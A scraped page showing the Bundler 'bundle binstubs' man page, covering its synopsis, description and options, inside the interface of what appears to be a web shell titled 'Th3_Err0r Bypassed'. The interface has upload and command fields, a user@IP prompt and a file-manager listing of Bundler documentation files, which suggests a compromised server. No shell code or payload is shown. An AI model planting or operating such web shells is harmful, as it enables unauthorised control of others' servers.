[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.216.140: ~ $
bundle-binstubs(1) -- Install the binstubs of the listed gems
=============================================================

## SYNOPSIS

`bundle binstubs` <GEM_NAME> [--force] [--path PATH] [--standalone]

## DESCRIPTION

Binstubs are scripts that wrap around executables. Bundler creates a
small Ruby file (a binstub) that loads Bundler, runs the command,
and puts it into `bin/`. Binstubs are a shortcut-or alternative-
to always using `bundle exec`. This gives you a file that can be run
directly, and one that will always run the correct gem version
used by the application.

For example, if you run `bundle binstubs rspec-core`, Bundler will create
the file `bin/rspec`. That file will contain enough code to load Bundler,
tell it to load the bundled gems, and then run rspec.

This command generates binstubs for executables in `GEM_NAME`.
Binstubs are put into `bin`, or the `--path` directory if one has been set.
Calling binstubs with [GEM [GEM]] will create binstubs for all given gems.

## OPTIONS

* `--force`:
  Overwrite existing binstubs if they exist.

* `--path`:
  The location to install the specified binstubs to. This defaults to `bin`.

* `--standalone`:
  Makes binstubs that can work without depending on Rubygems or Bundler at
  runtime.

* `--shebang`:
  Specify a different shebang executable name than the default (default 'ruby')

* `--all`:
  Create binstubs for all gems in the bundle.

Filemanager

Name Type Size Permission Actions
bundle-add.1 File 1.8 KB 0644
bundle-add.1.ronn File 1.52 KB 0644
bundle-binstubs.1 File 1.58 KB 0644
bundle-binstubs.1.ronn File 1.38 KB 0644
bundle-cache.1 File 3.4 KB 0644
bundle-cache.1.ronn File 3.04 KB 0644
bundle-check.1 File 964 B 0644
bundle-check.1.ronn File 857 B 0644
bundle-clean.1 File 737 B 0644
bundle-clean.1.ronn File 624 B 0644
bundle-config.1 File 21.28 KB 0644
bundle-config.1.ronn File 18.84 KB 0644
bundle-console.1 File 1.64 KB 0644
bundle-console.1.ronn File 1.42 KB 0644
bundle-doctor.1 File 1.14 KB 0644
bundle-doctor.1.ronn File 975 B 0644
bundle-exec.1 File 6.61 KB 0644
bundle-exec.1.ronn File 5.88 KB 0644
bundle-gem.1 File 5.19 KB 0644
bundle-gem.1.ronn File 4.56 KB 0644
bundle-help.1 File 453 B 0644
bundle-help.1.ronn File 349 B 0644
bundle-info.1 File 479 B 0644
bundle-info.1.ronn File 402 B 0644
bundle-init.1 File 1.14 KB 0644
bundle-init.1.ronn File 1016 B 0644
bundle-inject.1 File 844 B 0644
bundle-inject.1.ronn File 693 B 0644
bundle-install.1 File 16.6 KB 0644
bundle-install.1.ronn File 15.69 KB 0644
bundle-list.1 File 963 B 0644
bundle-list.1.ronn File 788 B 0644
bundle-lock.1 File 3.11 KB 0644
bundle-lock.1.ronn File 2.97 KB 0644
bundle-open.1 File 835 B 0644
bundle-open.1.ronn File 638 B 0644
bundle-outdated.1 File 3.27 KB 0644
bundle-outdated.1.ronn File 3.06 KB 0644
bundle-platform.1 File 1.43 KB 0644
bundle-platform.1.ronn File 1.21 KB 0644
bundle-plugin.1 File 2.27 KB 0644
bundle-plugin.1.ronn File 1.86 KB 0644
bundle-pristine.1 File 1.64 KB 0644
bundle-pristine.1.ronn File 1.46 KB 0644
bundle-remove.1 File 847 B 0644
bundle-remove.1.ronn File 730 B 0644
bundle-show.1 File 688 B 0644
bundle-show.1.ronn File 596 B 0644
bundle-update.1 File 13.58 KB 0644
bundle-update.1.ronn File 12.5 KB 0644
bundle-version.1 File 640 B 0644
bundle-version.1.ronn File 473 B 0644
bundle-viz.1 File 1.22 KB 0644
bundle-viz.1.ronn File 1.06 KB 0644
bundle.1 File 3.75 KB 0644
bundle.1.ronn File 3.29 KB 0644
gemfile.5 File 22.7 KB 0644
gemfile.5.ronn File 20.7 KB 0644